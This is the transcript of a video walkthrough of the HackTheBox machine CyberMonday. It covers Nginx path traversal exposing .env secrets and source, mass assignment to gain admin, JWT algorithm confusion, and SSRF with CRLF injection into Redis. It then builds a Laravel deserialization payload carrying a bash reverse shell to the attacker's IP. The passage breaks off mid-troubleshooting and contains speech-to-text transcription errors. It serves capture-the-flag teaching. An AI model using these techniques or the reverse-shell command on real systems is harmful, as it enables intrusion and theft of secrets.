What's going on YouTube? This is Ipsec. I'm doing Cyber Monday from HackTheBox, and this, I think, could be one of my better videos because a lot goes wrong when I was recording this, and there's a lot of just troubleshooting methodology that went into this video, and I think that's one of the most important skills as a hacker. And a lot went wrong just because there's a lot going on for the user, at least. It starts off with a Nginx misconfiguration. It's the off by slash thing that lets you pull the source code of the application. You discover a mass assignment vulnerability that lets you get admin on a web app. That leaks a different web application that is vulnerable to a JWT algorithm confusion. There's some server-side request forgery into protocol smuggling, which allows you to write to a Redis database. You can write a Laravel cookie in there and do a PHP deserialization attack. There's so much that goes wrong. We do a lot of troubleshooting in this video. I think it's going to be good, so don't let that daunt you. The root is also pretty fun, but let's just hop into it. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it CyberMonday, then the IP address of 10.10.11.228. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's a Debian server. We also have HTTP on port 80, its banner tells us it's Nginx, and we have a redirect to cybermonday.htb. So let's go ahead and add this to our host file. So sudo v etc host, and then we can add 10.10.11.228 and cybermonday.htb. So let's go take a look at the page. So cybermonday.htb, and we see it looks like a online store. So my first guess is trying to figure out what this is coded in. And the easiest way to do that generally is get a 404 page, because a lot of times the 404s are unique. And I know this one is going to be Laravel, just based upon the way it looks. I'm trying to find something we could just Google for it. But if you do enough pen testing or testing these apps, you start to recognize the 404 pages. I'm not sure what we could Google there, but we know this is going to be PHP. I bet if I did index.php, we get here. If we did index.phpa, it gets a 404 not found. So that's further confirmation it is going to be PHP. So let's go to run a GoBuster. So do GoBuster dir for directory mode, u, http cybermonday.htb, -w for word list, opsec list, discovery, web content, raf small words, .text. We also need the -x for extension, do PHP, and out file, we'll call this gobuster root.out. And we'll just let that run so we can start poking at things while it goes. There is a login, so let's just click on login, and we can try logging with admin. It says email address, so let's do cybermonday.htb. And we don't get anything. Invalid credentials. And it just occurred to me we could probably figure out its Laravel based upon cookies as well. So if I turn intercept on, we send the request, and let's see, we just see SSRF token. We have two different tokens. Generally, when I see two tokens, I think it is going to be Laravel. Decode this. And if we look at exactly how this cookie is encoded, this is another just indication, right? And these are all ways I generally like fingerprinting web applications. So as I'm doing boxes, I always like looking at this stuff. Wait, what? Was that double encoded? What did I copy? Okay, Control C, base64-D, base64-D. I guess that is double encoded. Weird. I don't know if that's typically Laravel or not, but we do see IV, value, Mac, and tag. I wonder if I just Google that. If I go cookie, IV, Mac, value, tag, turn burp suite off. And the very first thing is a Laravel thing. Here's another one. So again, just ways to fingerprint the applications. Let's try signing up for an account. And we can do username, we'll do ipsec, email root at ipsec.rocks, password of password, click sign up. And then we can try logging in to see what we have. We click password now. It's logging in. I think the web app site's going a little bit slow because I am running the Go Buster. I may turn that off because I think it's got what we wanted to see. But if I go to /home, we can see this. If I go over to Go Buster, we have login, index.php, log out, products, sign up. There is a dashboard, but we may be able to do what I want to show on home. So I'm going to do a new private window so it doesn't have any cookies. If I go to cybermonday.hdb/home as an unauthenticated user, it directs me at login. There is a /dashboard. I want to say there was a dashboard. There we go. And this tells us that debug is enabled for Laravel. And it is full confirmation that it is running Laravel, specifically version 9.46.0. We also got the PHP version here. And then it's showing the snippet that errored out. And the reason it errored is in the first request to check if I'm authenticated on /dashboard, we have auth user is admin. And because I did this in my incognito window, I don't actually have a user. So that is where this is failing. There's not much more information we can get out of this. It's just something I wanted to show. If you ever see verbose error messages like in debug mode, that is definitely going to be a finding. So looking at this, there is one thing that stands out. If we look at the 302 redirect and this 301 redirect, we have /assets redirecting to assets /. And this isn't always going to be a finding, and something that normally a web scanner like Burp Suite Scanner, I think Invicti is another one, NetSparker, various scanners will be able to detect this automatically. But if we go to /assets, we see it. Let's actually go to Burp Suite so it's a bit more visible what we're doing. And this is going to be an Nginx thing I generally test for when I see a directory redirecting this way on Nginx. So send this over to my repeater tab. If I do a git on /assets, it redirects me to assets /. The other thing I'm noticing is the x powered by is not in any of these. If we did a request, let's just change it to /. It's going to have a bunch of PHP headers, right? So x powered by PHP, we have the XSRF token, things like that. So since those headers are gone, we know we're not being sent to the PHP like FPM, I think it is, or Field Pool Manager, whatever it is. We're not being sent to PHP and Nginx. So this tells us we're in a different stanza of Nginx code. And because it's redirecting us, we're probably going to be in an alias. And the alias or the actual server header doesn't have a / terminating it. So let's look at Nginx off by / real quick. So if I do Nginx off by /, go over to Google, hopefully we can find something good. Tenable, no. Let's see, maybe this. Next off by /. Yeah, this is going to be good. That's missing root location. Off by /. So this is what it looks like, the actual Nginx config. And because it doesn't have a / in the location, I think I said server before, but it's in the location, it's not ending with a /. We actually have a directory traversal here because it's going to match anything with /static and then send what's after static down to the alias. And since it's matching before the trailing /, if we put a period, we're going to end up in user share Nginx. We can't go more directories. You're kind of locked into wherever you hit. So I can't go down all the way and go back up to get etc past WD. But we can go up one directory. So let's go over here and we can test for this again. So I did assets period, or if we do assets, we get a 301. Assets period, 301. Assets period, 301. 3 periods, it gets a 404. And that's just because of how the file system is behaving. So if I did a ls nmap, that worked. ls nmap period, that's current directory, period is going up one directory, 3 periods ends. So that is how the Nginx off by slash is working. It's just a vulnerability because they didn't put a trailing slash here. The reason why you have like these slash static slash asset is mainly for like CDNs, because the image, like the assets, if we looked at what is being loaded, it's probably a bunch of big images, right? You don't need to deploy that with your code. So you just have some like type of CDN where all the images are stored. So it's not bogging down the server where you have the code actually there. And you don't want PHP handling the image as well. So that's why you have these separate locations for your static files. Just make sure you have a trailing slash on them, unless you can do something like this. So since we do assets period, we're going up one directory. So the very first thing I generally test for is, let's try index.php to see where we are, if this returns anything. We get a not found. It went over to the PHP header, and that's probably because there is something in this Nginx where there's a location and it says any request that ends in .php, send it to the PHP socket, right? So you probably can't end in PHP. We could do like readme.md as a popular file, and we do get something. We get about Laravel. So we got the README of the page, and that's typical of when you see readme.md, it's probably going to be in some type of Git instance. So I can try a/git. We get a moved permanently. If I do a file in Git, like say head, we can see it return something. So we have a open Git directory, so we can clone that. The other thing I would test for is a .env, because this is generally a sensitive file. It contains things like the credentials to a database. We can see database username and password is both root. So if we can access MySQL, we could try logging in. We can see Redis is probably configured. The prefix is Laravel session. So all the Laravel sessions are being stored in Redis. Take note, because that's going to come in important later. But you get to see all the secrets of the application. This is going to be the encryption key for the Laravel cookie. So we can also decrypt the probably CyberMonday session here with this, which will come in again later on in this video probably. So let's focus on the .git directory now. And just remember, we have the environment variable for later. So I'm going to run the tool git dumper. And if you don't have it, this is just, I believe, a pip install. I think it's like pip3 install git dumper. If you don't have it, let's see, does this install? Yep, it does. So that's how you'd install it. I'm going to make a directory called source, and we're going to do git dumper, the URL, so http cybermonday.htb/assets /git. And then we're going to specify the directory we want the source or the git downloaded to. Maybe we don't put a trailing slash, because I noticed it did / right there. 404. Do we just do that? There we go. So it automatically appends the .git for us. So now it is going to download, copy everything into that source directory. So if we go in cd source, do a ls, we can do a git log. There's only one commit, guest@mail.com, but we have all the PHP code. So let's open this up in Visual Studio Code and then go over it, right? So it is now pulling up, and I'm going to let this load so we can have Sneak tell us if there's any vulnerabilities. It's running the code security check now and open source. So it didn't find any vulnerabilities in the dependencies. Code security did find a hard-coded credential. And if we look at it, I'm guessing this is some type of like unit testing thing, just because we have Faker in this. Not like the League of Legends player Faker, but generally when I see something like this, it's just inputting a fake name in the database, probably testing for like authentication or something like that. So this vulnerability can probably be ignored, which means we need to look at the code the hard way, manually. So the first thing I generally do is go to routes and look at what routes there are. We have /user, models, console. So if we go web, these are all the routes. If we look at like sign up, I'm probably going to look at like sign up, login, profile update, like looking for SQL injections, things like that. I'm just focusing on fields that we have user input for, right? So I go app, HTTP, controllers, the auth controller, because we have that here. We can see it in how we do registration. And this doesn't look vulnerable to me. It starts off with validating. We have 3 parameters, the username, email, and password. I'm guessing this is doing some type of regular expression to confirm it is a valid email. It has like at a domain.com in it. And because it's using validate, only these parameters will ever be pushed to validated. So then it goes to do an insert and we add it, right? We're not doing raw SQL or anything like this. So nothing looks vulnerable here to me. So let's go take a look at the next route. Let's look at update. And this is in the profile controller. So we can go profile controller, look at update. And this is something that is probably, you may want to like grep for in code to look for, because anytime you see accept, this is kind of a dangerous field. So it's going to take the request object and take everything the user supplies except these parameters. So they blacklist the token, the password, and password confirmation. And if the password is set, it's going to check the password and then decrypt it. So that's why it doesn't care about taking the password here and putting it into this data, because they want the data to be the decrypted form of password. So they remove it from the user. It doesn't remove it from the request altogether. The request goes into data, and they're checking the password specifically here. So they handled that well, and then they do update. So there is an issue. This is going to be vulnerable to mass assignment, which means we can write to any column in the database with the exception of these. And there is one other thing you can do to protect it in Laravel, and that is specify a guarded page or guarded variable in the controller, or the model, not controller. This is probably going to be the user. So if I go to user, we can see guarded, and that's the remember token. And this is attributes or mass assignable. So you'd put anything here, and if it's in here, anytime you would do a quote unquote mass assignment, which just means give me everything from the user and then send it to another object, that guarded parameter, guarded variable, does not get included in it. So there is probably a group flag or something in the column that we may be able to add. So let's look at the database. We can go to the user factory. Let's see. That's not it. Migrations. And let's see. This is the products table. Where is going to be user, personal access token, password reset, user. So we have the fields username, email, password, and is admin. The default is 0. So if it's not specified, it's going to be 0, but we can specify it when we register. And because it's not a guarded variable, we can set it to be 1. And if it is 1, then we become admin. So let's go and try to register a user. So I'm going to go back to Firefox. We can go here, log out. And then I'm going to create an account. I'll do username ip, email address root at ipsec.rocks. I'll call this admin at ipsec.rocks, I guess. 1, 2, 3, 4. And the password of password. And now let's intercept this request. So we do burp suite, intercept. Go to proxy, intercept on. I'm going to send this request to the repeater tab just because I want to play with it a little bit after we do it, right? So I'm going to do and is admin is equal to, we'll do true. And we hit send the request. We get a 302 found. I guess we can follow the redirection and render. And we have registered. I actually did not expect that to work. Let's just go back to log in and see if we are indeed an admin. And is my GoBuster running? It is. I am going to kill it. We did see dashboard did show us the 500 page. So we can do admin at ipsec.rocks, password of password. And do we get anything else? Products, home. It doesn't look like it. What did my request look like? Oh, I did on registration. The mass assignment was on the update field, right? So adding this parameter did nothing because, again, remember, it took the validated input and there wasn't anything there. So we want to go to view profile and then we can update this. So let's do burp suite, go to proxy, intercept on, click update, send to repeater. And here we go. Let's do and is admin equals true. Send the request. And we get an error. And the error we're getting is going to be, let's see, forget an entity error, I want to say. I forget the exact wording for it, but it expected an integer and we gave it a string. So we gave it true. It wants 1 or 0. So let's just do 1. It's loading, redirecting, and then we become admin, I believe. So let's refresh this page, take it off of Burp Suite. And now we have access to dashboard, which is admin. Before you go into this, I do want to play with this a little bit because whenever I find a vulnerability like this, and I find it through static code review or code analysis, I always like going back to see if there was something I could have done in the recon game to figure it out, right? So I'm going to, let's see, was this the update? It is. So let's try putting a bad variable in. So if I do does not exist is equal to 1, I'm curious if this makes the whole request fail because it's going to go here and we're going to have an unexpected parameter or variable in this data. And when it goes to update the database, I wonder if that unexpected value crashes this update so it doesn't actually update. So that's all I'm doing to test. We send it, it redirects us. Let's follow the redirection and see what that looks like. Or it redirects us to home profile, and we have the profile being updated. So we didn't get displayed an error message, but it's possible it updated or it didn't update, but it just showed us that it did. So what I'm going to do is change my username. So we'll do ip2. So this will be full confirmation that the query works because we actually changed something. So when I send it, it's going to render the page. We want to follow the redirect. And our username is ip2. So we probably wasted 2 minutes poking at this, but it did tell us there wasn't any good way for us to detect the mass assignment vulnerability in Laravel. So even though we didn't really get anything from doing this extra recon, we still know something in the future. Like when we come across another Laravel project, we know this wouldn't just crash it. If you come across a framework where just adding unexpected parameters to it does crash it, adding to the database, then you'll know when a field may be mass assignable because you'll be able to add a field. It doesn't, like, you get a database error. And you're like, oh, they're not just, they're just taking any field we give it and throwing it at the database, which is safe if you use guarded things and protect against mass assignment. But if you don't, obviously not safe. So hopefully that piece made sense. Let me know in the comments if it did or did not. And if you like me going in on those random tangents. But now we are logged in as the admin. And this page doesn't make that much sense to me. We got some pretty graphs, so some executive probably loves it. There is funny names like Obi-Wan Kenobi, Greedo, and Darth Vader. But the first thing that grabs my attention is always a change log, because there may be good information here. And looking at it, there is a unreleased change log. I'm just looking at these links, and adds a webhook, and we get a new domain to this. That did not copy link. There we go. It is webhooks-api-beta.cybermonday.htb. So let's add this into our host file so we can hit it. So sudo vi etc host and add the webhooks beta. And let's go click on this link. And we get nothing. Let's just go back here and we get some documentation on exactly what this is. We should also, again, do some recon on this and run a Go Buster. Before I do that, I wonder what technology this is. Let's go back over to proxy, intercept on. We need to intercept here, refresh, look at it, and we still see X powered by PHP. So it's probably going to be some type of Laravel backend. See, if we don't give it a PHP cookie, does it give us one back? It does. So definitely we are talking to PHP. So before we go and play with all these endpoints, let's just set up some type of recon. Again, always like having recon run in the background. So we'll go back up to our Go Buster, put the new domain in. And then let's change this to be webhooks.out. And I'm going to change this. I'm going to take a little advantage of hindsight. And I know what I'm looking for isn't on RAF small words. Another one I generally look at is common.txt. So that will help out a little bit later on if we just run that now. So let's just look at these parameters. And there is a register function. So we probably want to hit this first. So I'm going to do a curl-x post, HTTP. This should still be my clipboard. And then we do /register, auth register. Then we can do -d, username is equal to IPsec, and password is equal to IPsec. And we get an error message, username is not defined. So I'm not exactly sure why we got that. Let's go back here. It wants username, password, and to be a post. Let's just intercept this request so we can see what we made. So I'll do -x to send it to a proxy, HTTP, localhost 8080. Send it to repeater tab, click send, and we get username is not defined. Let's see. Well, this is an API, and it gave us data in JSON format. And most of the time when we talk with APIs, they like JSON. So let's try changing it to application JSON, and then setting this to be JSON as well. Okay. There we go. And we have a success. So we have registered the user IPsec on this API. If we go over, there is an auth login. So let's try hitting auth login. It wants username, password as well. So send the request, and it sends us a X access token back and gives us this. So let's just put this token in, X access token, and we'll place that. So I'm guessing that will allow us to do a GET request on /webhooks. So let's change a request method, and we can just hit webhooks. We get success, and we can see a webhook for test. So let's see what we can do. We can go to this UUID and probably create a log file. Let's try, though, creating our own webhook. So we can do webhooks create. It's a post. So let's do webhooks/create. This is post, so change the request method. Content type, it's going to be JSON. And then we need what fields? Name, description, action. So we'll do name, cool webhook, description, does a thing, and we'll call action the thing. So if we send this request, we get an error unauthorized. If we look at our JWT, let's see. I do have a new plugin installed. If I go, let's see, if you want to install it, go to Extensions, App Store, and search for JSON. I've installed the JWT editor and JSON web tokens. I think it's the JSON web tokens that lets me see this easily. So if I just click on this, it displays the token for me. So I can see it's a RS-256 token. The role is user. And we could also just do what we normally do if you didn't want to use this plugin. We can always copy this, go to jwt.io. Let's disable Burp Suite, paste the token in, and you can see this. And this is going to be a RSA encoded thing instead of HS, which most people are familiar with. HS, I think, is HMAC it stands for. And the big difference, or the reason why you use RSA, is if you want the token to be able to be used with multiple services, and you don't want to expose the secret key to many services, right? So think of it in terms of like OAuth, right? You want to be able to have, let's say, HackTheBox be able to accept a token from Google, right? Google doesn't want to give HackTheBox the secret, but they can give a public key that also lets them validate the token. So this is just a asymmetric algorithm to encrypt it. There are some vulnerabilities in this. One of the entry ones, easiest ones to test for, is an algorithm confusion attack. You're probably familiar with something similar when you just remove the algorithm and send a unsigned token and the server accepts it. In this case, we change the algorithm from RS to HS. So we tell it it's a HMAC signed thing, and then provide the public key as the signing key, and maybe the server will accept it. So that is the smuggling attack. Now, in order to get this to work, we need to find the public key. And typically, the public key is going to either be on the web server somewhere. There is a common thing. It is a, let's see if I can find it. Over here. Yeah, it's in the common. So it's jwks.json. It's either in like the .well-known directory in this or on the root. I think it's JSON web something set. What does jwks.json? Go over to Google. JSON web key set. So let's go view that file. Go over here, jwks.json, and it's a list of keys, and they only have one key. It's going to be RSA, and it's in a format you're probably not familiar with. It's just displaying the two exponents, right? The two main exponents in a public key are N and E. E is going to be the exponent. It says AQAB, but this is just, it's like 65,000 something. Let's do Python 3, import base 64. Let's do B64 decode this base 64 dot. Okay. And then let's see, int dot from bytes, I want to say. We need byte order. It is big endian encoded, 65,537. This is a very, very common exponent in RSA. If you've ever done anything with it, you probably recognize that number. So the next piece is this key. So let's grab this, and we'll do the same exact thing, but we'll call this. And we see a very large exponent. So let's just say n is equal to that, and then e is equal to that. So now we have both those keys in exponent form. We want to create the public key. And if you don't have the package on your computer, you can just do like a pip3 install pry cryptodome. I want to say that is. Yeah, PyCryptodome. So we can say Python 3 generate RSA key with an E pi crypto dome. Let's see. Do we have a good example? Okay. From crypto public key import RSA. So that's the pi crypto dome package. We have N and E already. So we can probably do RSA.construct, and then we give it a dict value and E. And modulus is not odd. Oh, that is an even number, it looks like. I'm just saying because it ends in 2. Let's see. Let's look at this. So this still decoded, but I'm guessing we did the wrong base 64 because it's got dashes and stuff instead of the plus. So this is a URL safe base 64. So I'm going to say n2 is equal to n. And n2 is going to be the non-URL safe. So let's redo this and see if we get a different integer if we do this. Incorrect padding. Let's just add padding manually. Okay, so let's look at n. N ends in 7. That is good for this number being prime, because n2 was definitely not prime. I think this number is bigger. So now let's do that RSA construct again. There we go. We got a key. So I'll call it key. We can call it p key for public key. And then we can do a pkey.export key. And this is probably what you're used to saying for a key, right? Let's do a .decode, and we can also print it. Print decode. There we go. So this is the public key. So what we can do is save this to a file. So we'll call this vkey, paste it in. And I always like, when doing this type of attack, XXDing it, and you only want to see one OA. It is very specific on the line break, right? If you had it like this and you copied a extra line break and it's 0A, 0A, it's going to fail the signing of the next step. So always important that it only ends in one line break. So let's base64 encode this. So do base64 key -w0, and now we have a key. So let's go back to JWT.io. I'm going to change the algorithm to be HS256. We're going to change our role to be admin. We're going to paste our secret and say it's base64 encoded. And then I'm going to copy and paste the key. Let's see, X access token. So before we got error unauthorized, we paste this key and we got past that error. If you wanted to avoid using JWT.io, let's just go back here. We have this key. We could go to the JWT editor. Let me delete this and do a new symmetric key. I know this is an RSA key, but you have to do symmetric key. You can click generate, go under the K parameter, paste this. So now we have this key. So when we go back to the repeater tab, we can go over to JSON Web Tokens. Let's change this to HS256, change the role over to admin, and then we want to click sign. We don't want to modify the header. We're going to sign with the key we just created. Click OK, and it's updated the token for us. If I click back here, you can see it's much smaller. Click send, and oh, that's not what I expected. We screwed something up here. Let's look at this. EY. Oh, I put the key we want to copy the secret. This EY is the key I had on my clipboard. So if I put the correct thing in there, let's go back and redo this. So repeater, go back here, go to the JSON web token, HS, role is admin. Let us sign this key and then click send. And there we go. So you can either do it from within Burp Suite if you like all these JSON plugins. You can do it through jwt.io or maybe like JWT tool if you want to use command line. 100 ways to do it. But yeah. So now we have this. It says only letters, numbers, and underscores allowed in the name. So let's get rid of the space in cool webhook. And this action is not available. We can either send a request or create a file. So let's do send request and done. Send me a request to execute the action as the event listener is still being deployed. So the webhook UID is this. And if I just do a get on webhooks, let's try this real quick. Get webhooks. We can see our cool webhook is created. So if we went to this UUID, it probably has to be a post. We need a URL. So let's do JSON. And we could also just look at the documentation because I think it says the send request, it needs URL and method, right? So you can either get it from docs or just play with it. We could do URL. Let's do our own IP, 10.10.14.8. We'll do port 9001. And let's listen. Send it. Method is not defined. So let's say method is equal to get. It waits, and we have now made a request to us. So we control that, C out of that, and it just says the URL is not live. We could stand up a web server, so Python 3, HTTP server 9001, make it, and it displays the content back to us. So at this point, we could probably do 127.0.0.1, port 80. Let's see, does this work? It is hanging and says URL is not live. Let's do 10.10.14 or 10.10.11. What was the IP? 228. We get URL live. So this tells us this thing is probably in some type of container, right? Because we know 10.10.11.228, this is a web server, right? 127.0.0.1 said it wasn't listening, but this says it is. So that tells us we're in a container. The other thing we know is there is a environment. Let's see, do we have it here? .get. If we go back to the off by slash assets, CyberMonday, no n slash there. There is a host name called Redis, so we could test if that works, right? So if we do a get on Redis, we see URL is not live. It responded immediately. If we do Reddit does not exist, it's going to hang because it doesn't know this. So this does exist. Let's see, send the request. Now it's waiting. Let's just send it. There we go. And I'm going to send a few. We have around 100 milliseconds of latency, right? So 6379. Is that the port? And still around 100 milliseconds of latency. What I'm trying to do is validate if this port is open. 6379, 6379. And I'm hoping I could determine if the port's open based upon latency, but it doesn't look like I can. Because a request on 80 and 6379 does not come back. Let's see if, and that's probably because when we connect to this port, it's not sending HTTP back. And since it's localhost, it's blazingly fast. If this Redis server was on a different box, then you'd probably see an increase in latency there, right? But since it's not, you don't see that. So I want to test for like protocol smuggling. even if we connected to this, Redis isn't going to respond back in a HTTP compliant way, so a web browser isn't saying the URL is live. But we can manipulate this GET, right? So let's go to 10.10.14.8 again. And I'm just going to listen 6379. Whoops. We just do this. We see it is the GET. NCLVNP 9001. I'm going to add a K, and that's just going to keep it open. So if I send the request, I did 9001. We can see it responds. Oh, the K is not going to help me because I wonder if I send it, send something back, URL not live, did not stay open. Sometimes the K works where if the server closes the WebSocket, then you don't have to keep hitting enter again to start it. But this is not one of those cases. So let's go back and we can change this method. Let's do pretty so we have it on different lines. So if I put ipsec rocks here and we hit enter, what we see is it connects to us and then writes ipsec rocks. So what I want to do is see if I can enter new lines, because if I can put line breaks here, I can make valid Redis queries, and then it would just error out once it hits the HTTP piece. So let's do this again, /r/n, and we see it just says ipsec rocks. So now we can interact with a socket manually. So let's do 6379, and let's do Redis. So if we went to Redis commands and look at their documentation, and I spent a lot of time looking at this documentation page with OXDF to look at all the commands we can do. Eventually, we found this migrate command. And all we're looking for is a command that allowed us to talk to a different host. So this migrate command allows us to send a single key over to another host. And the thing is, we have to know the key. So we're going to do two Redis commands. The first one is going to be creating a entry in Redis, and the second one is going to be migrating it. So let's see. I want to say there was a create. Create a new time series, key, returns all, Redis, create key. Set is the command. Set right here. So we can just set the key and the value. Does it give us an example? Yep, set my key, like that. So let's do a set. I'm going to call the key ipsec, and we'll say, please subscribe. We get an error URL is not live, but now let's go test the migrate command. And does this give us an example? It does. So we can say migrate, and then 10.10.14.8, the key, we called it ipsec, and then 0500, I don't know exactly what these are, destination, DB, and timeout. So we'll say 5000. Okay. We've got the port, 6379. So if I do a NCLVNP 6379, let's send it. It's hung. We look at this, and we see our key and the value here. And the connection was from this, right? So this validated that we were able to issue commands to Redis. We don't know what keys are in the database, and I don't know a good way to enumerate that other than like guessing from eventually the information we get. But all I'm trying to do here is prove that we can interact with Redis, right? Because if we didn't prove we could interact with it, then the whole next step is like a lot of blind things, just trying to do things and hoping we're interacting with it, but having no way to. This will also let us debug things because we could send the request and then see what we wrote in the database, right? And the other thing I'd probably do is run a Redis copy. So let's do 6379 Redis latest. So it can't find a copy of Redis. It's going to just go download the Docker and then run it, right? So now we have Redis running Docker PS. There we go. Let's do a Docker exec it f9682 sh Redis CLI. So now we're in the local Redis database of our box. If I do a key star, we have empty. And the migrate command, if you don't specify copy, it's going to delete the key. And I forgot to do copy. So if I ran this migrate command again, it probably wouldn't do anything because that key no longer exists. So let's set the key with ipsec, and then we can now migrate. It responded immediately because a Redis server probably responded, right? If I do key star, we can see ipsec is there. So keys ipsec. Let's see, how do we dump keys? Redis dump keys. I forget the syntax. Is it just dump? Redis dump. Let's see. Dump key. Dump ipsec. There we go. We can see the key. I don't know why it wrote that stuff. That is weird. There's probably a git. So git ipsec. There we go. That's what we want to do. This probably dumps it in like how it's stored in some weird serialization format, but git is the command we want. So now that we have that, we have to think at what Redis, the whole purpose of Redis is in this application, right? And if we went back to the very beginning, we have it in a burp suite window here. I should just name this env. We have the Redis prefix of Laravel session and then colon. So since it's a prefix, this is going to be where the cookies are stored. Here is our Laravel cookie. So now we have to decode this. Let's see, echo that. That's an equals base64-d jq dot. So if we had Googled all these, and I did it earlier in the video, it tells you it's PHP Laravel. You go to a Hacktricks page, and they give you a script where you can decrypt the key, right? But we're going to skip that, right? I'd rather just do it manually instead of just showing Hacktricks decrypt Laravel. Let's see. Can I pull this up quickly? Laravel Hacktricks. Come on, load. Let's see. Decrypt. Yeah, decrypt cookie. So this looks scary, right? But the only thing you really need to know is the how it is, and it's AES 256 CBC. I'm trying to find where it says that. So we got crypto cipher import AES. AES, or is it base64 decode, HMAC new, hex digest, AES key size new. So AES mode CBC. So again, I think this is scarier than just doing it ourselves. So if you saw some documentation that just said Laravel cookies are encrypted with AES 256 CBC, which if you search documentations, you probably will see. So let's just go on that. And let's go to CyberChef. We do AES decrypt, CBC, the key. We're going to say it's a base64 key. Go back to the environment. Grab this value, paste it in, the IV, That was in our base64. That's also going to be in base64 format. CBC, the input, we're going to say is raw. I wish the input, they had base64 as well. We'll just put this here. And then we also have to tell CyberChef to base64 decode it before this. And here we go. We got two things. So this is going to be the actual cookie we have. And this is the second piece, I think. I am confusing myself with this. So let's just prove it. Let's see. We have Redis standing. So it should be Laravel session and this. So let's go back here. We'll migrate. I'm going to add a copy so we don't delete the key. And we'll say Laravel underscore session, this. And this should send us the value of our session. URL is not live. Let's really hope we have it. We don't. Let's see. Let's go back here. Where do I go? Environment. Redis prefix. Let's go back to this. We'll call this Redis. I did not make a typo there. That is not a key. I don't think we would do this. I wonder if our session just died. Let's see. It's very possible that we're working with a old key. So we're definitely logged in here. Let's do the same thing here. Echo basic4d. Fix this padding. JQ dot. See, is this IV different than what we had? Hard to tell. Looks like it is. So, shoot. This is the IV. I copied it in the wrong field. Okay. Let's try this. Key star. That doesn't work. Does not work. Let's try the second parameter. There we go. So is the second one. And now we have this key. So if I do get this, we can see the value, right? So this is what the PHP session looks like. So we have like our token. This is a string. Maybe that's the IV. I don't know what that string is. I'm just saying IV because it ends in IV. Let's see, echo base64-d. No idea what that is. Previous, the page I'm on, the flash message, something, but this is the Laravel cookie. And the key piece is, this is a serialized object, right? Since it's a serialized object, that means there's probably going to be a way to do deserialization because it's pulling this cookie, it's unserializing it, and then executing. And if we go to phpggc, is it GGC? I think it's GGC, PHP gadget something, generic gadget chains. There we go. And we look at this, there is a bunch of Laravel, and it tells us what versions they are good for. I'm going to do Laravel RCE 10. I like toString. I guess we could do destruct as well on RCE 9. But the key piece is just making sure there's a version that matches what our Laravel was, right? And if we went back, let's go to a private window, CyberMonday, dashboard. This let us enumerate the Laravel version. Ooh, it says 946. And this did not say, this said 9.1. So maybe the documentation is not open, updated. It does say plus. So it does work beyond that. We wouldn't want to do like one of these down here. So I'm just going to do RCE 10. It's the latest. So I think I have that in opt, cd opt, phpggc. So we can execute this. And then we say Laravel RCE 10 system, and then the command we want to run. So I'll do a bash-c, bash-i, dev, tcp 10.10.14.8, 9001, like that. And I changed up the quotes. Normally I do a single quote, then a double quote. The reason why I'm making sure I do this is because we're going to be pasting it inside of JSON. And this quote gets thrown away because I'm just quoting to say this is one single argument, not to separate on spaces, right? This quote will be in the payload. I don't want to have to deal with quoteception, right? So that's why I did single quotes here. So now we get this payload. So we want to write this payload inside of Redis. So let's do set ipsec, and we're going to paste that. And it does have a bunch of double quotes that we're going to have to escape. Let's see. V payload. That's not what I want. That is. So we'll do a %s quote, and then double backslash like quote. There we go. I did double backslash because I escaped the backslash. So that looks better. So if we save this, cat payload, now this may be JSON friendly. And there is an error here that I just want to show what happens because troubleshooting is so important, right? We send this and we get URL is not defined. That is a very different error than before, as URL is not live. So that indicates that probably our JSON or something is bad here. And the issue is probably going to be these backslashes. So let's do vpayload, shoot. I want to go back and grab this one. We can copy. It's easier if I do escape the slashes first. So we'll do %s, escape a slash, like that. There we go. So now all the one backslash is now two, so that escapes. Because the payload was treating backslash as a control character. So like it was saying \r and thinking that was some special command when it's not. So we have to escape the backslashes, and we still have to escape the quotes like that. And now that may work. So let's copy this, go here, paste it, send, and we get URL is not live. That is a good thing to get, right? I'm going to call this key ipsec2, and then I want to migrate ipsec2. URL not live, that's fine. Key star. Did not have it. That's not what I expected. Wonder if we have to put quotes here. Still don't see IPsec2. That is slightly worrying. Let's see. Let's do what we always do. Simplify the payload. We'll call IPsec2 test. Migrate. Still don't see it. We did IPsec3. We get rid of this copy. Something is going wrong. Let's kill our Docker. Did not get a connection. Make sure this key exists. Send it. Nothing. What did we screw up? Let's see. That is the command, right? So we set IPsec3, migrate. Yeah, that is the command. We have something really off. Oh. I don't have the /r/n. I bet if we do IPsec2 now, that works, right? There we go. Let's see, did I have /r/n in our payload like this? Don't think so. Let's do IPsec5, paste this, and we'll migrate. What's it doing in here? IPsec5. And it's hung. Why did it hang? I think my VPN just died. Or I killed Redis on the server. One of the two. Ping 10, 11 to 28. My VPN died. So I'm going to figure out what happened. Maybe my internet died when I was recording. And get that fixed. Okay. I am connected again. My internet's been flaky today for some reason, but let's do key start and pick up where we left off. So we're still trying to get this data written. If I send this, we get URL is not live. We go over here, we do this migrate command, and we don't get it. So we have the /r/n. I am going to put maybe single quotes around this. And I'm not doing single quotes around /r/n because I definitely don't want this to be interpreted. I'm scared if I put a single quote here, then it will send the keys /r/n instead of a new line. So let's try this. URL is not live. Migrate. URL is not live. Keys. We still don't get it. So let's see. We do get rid of this, Test. That took longer. We have it. So we know we're having some issue with this payload. And I'm not exactly sure what this is. I guess one way we could test it is let's send the request to 10.10.14.8 and we'll send it to 9001 and listen on it. Let's see, nc lvnp 9001. Okay. So we did a set ipsec5 and sent this whole command. That looks good to me. So what we could do, set ipsec, what keys do we have? Keys star, set ipsec, and what did I copy? That's not it. This. So let's just copy this. Because this is the command we're trying to run in that SSRF. So maybe we'll get lucky and we're going to get an error message here, which we do. Invalid arguments S. Let's see if we get rid of the single quote. I wish my home key worked, but it does not apparently. So we're getting invalid argument. There's probably something else. Oh. Do we have to escape all these? Let's see. What if we have to do double backslashes when escaping the quotes? This one piece of the box is taking longer than I expected, but hopefully you're getting some good debugging methodology type stuff out of this. Still invalid arguments. I think that's fine. Let's see. Set ipsec. We'll do this. Test like this. So quotes are fine. That is fine. That is fine. But why isn't this entire thing fine? Oh. That was fine. The only thing we did, I think, was escape the single quote. Okay, let's try this. So ipsec5, let's do ipsec9, I guess. I don't think we've used that. And we want to escape these single quotes. URL is not defined. That is not a good error. URL is not live. Let's do a double backslash. There we go. So the reason why I did a double backslash is I want to make sure this ends up in my request. So let's go where I have this, run this command, and we can see we are escaping the single quote here. That looks good. So let's now go back to Redis 6379. URL is not live. I like that error. Sec9. It took a 